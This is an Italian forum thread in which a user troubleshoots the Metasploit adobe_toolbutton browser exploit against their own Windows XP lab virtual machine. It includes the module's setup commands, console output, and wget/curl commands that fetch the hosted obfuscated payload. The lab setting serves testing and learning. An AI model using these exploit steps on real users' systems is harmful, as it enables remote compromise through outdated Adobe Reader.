Domanda Malfunzionamento di metasploit o scorretto utilizzo? Adobe Reader ToolButton

aleff-inforge

Utente Jade
28 Marzo 2020
524
57
1,752
672
Salve a tutte e tutti, sto provando a simulare un attacco facendo leva sulla vulnerabilità nota Adobe Reader ToolButton [1] tramite metasploit.
Utilizzo una macchina virtuale con Windows XP SP3 e Adobe Reader 9.0.
Questi sono i comandi che eseguo dopo aver lanciato metasploit:
Codice:
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <mio_ip_locale>
set SRVHOST <mio_ip_locale>
exploit

viene generato un link tipo http://<mio_ip_locale>:8080/e48Ef1eqM al quale clicco tramite Internet Explorer sulla macchina virtuale.

Reazione VM:
- Apertura di un documento PDF vuoto

Reazione metasploit:
Codice:
[*] <mio_ip_locale>   adobe_toolbutton - Sending HTML response to <mio_ip_locale>
[*] <mio_ip_locale>   adobe_toolbutton - request: /e48Ef1eqM/MYmLAV/
[*] <mio_ip_locale>   adobe_toolbutton - Sending PDF...


Mantenendo una riga vuota, come se effettivamente avessi una shell aperta ma se provo a scrivere un comando tipo dir l'output che viene mostrato è relativo alla mia macchina e non alla VM e dopo mi esce di nuovo la scritta msf6 exploit(windows/browser/adobe_toolbutton) > come se avesse chiuso la shell creata e per tornare a quella situazione devo ricaricare il link http://<mio_ip_locale>:8080/e48Ef1eqM dalla VM.

[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/
 

aleff-inforge

Utente Jade
28 Marzo 2020
524
57
1,752
672
Ultima modifica:
Quindi se vuoi testarlo in quel modo installa Adobe Reader 11.0.2
Grazie per aver risposto, provando a farlo funzionare su Adobe Reader 11.0.2 mi da come errore XMLHttpRequest non definito, hai idea di cosa potrebbe essere?
Firewall, Aggiornamenti automatici e Protezione da virus sono disabilitati.
1668585613457.png

Messaggio unito automaticamente:

Notavo inoltre che nelle impostazioni avanzate dell'exploit risultano alcune impostazioni settate a false nonostante ci sia scritto yes sotto la colonna Required, questa cosa potrebbe incidere?

1668587532238.png
 

0xbro

Super Moderatore
24 Febbraio 2017
4,148
162
3,182
1,645
Sembra essere un problema dell'exploit (quello che viene hostato e poi aperto dal browser). E' abbastanza complesso da debuggare poichè è tutto offuscato, puoi dargli un occhi tu stesso scaricando direttamente il sorgente hostato: $ wget http://192.168.1.80:8080/f1sRWSzBQLR

Sto cercando in giro per capire se si tratti di un problema noto
 
  • Grazie
Reazioni: aleff-inforge

aleff-inforge

Utente Jade
28 Marzo 2020
524
57
1,752
672
Ho esportato il documento tramite
Codice:
$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf
e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

1668589924103.png


PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale
 
  • Mi piace
Reazioni: 0xbro

0xbro

Super Moderatore
24 Febbraio 2017
4,148
162
3,182
1,645
Ho esportato il documento tramite
Codice:
$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf
e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

Visualizza allegato 66465

PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale
Sì quello è normale, il file è un file HTML che si occupa di comunicare con la C&C (metasploit) e scaricare successivamente il PDF.
1668590837263.png

1668591087771.png

Al momento non ho un ambiente con un Adbobe vecchio però, quindi non riesco a fare test dinamici.. stavo provando ad analizzare solo il codice ma è un po' complicato ahah
 
  • Grazie
Reazioni: aleff-inforge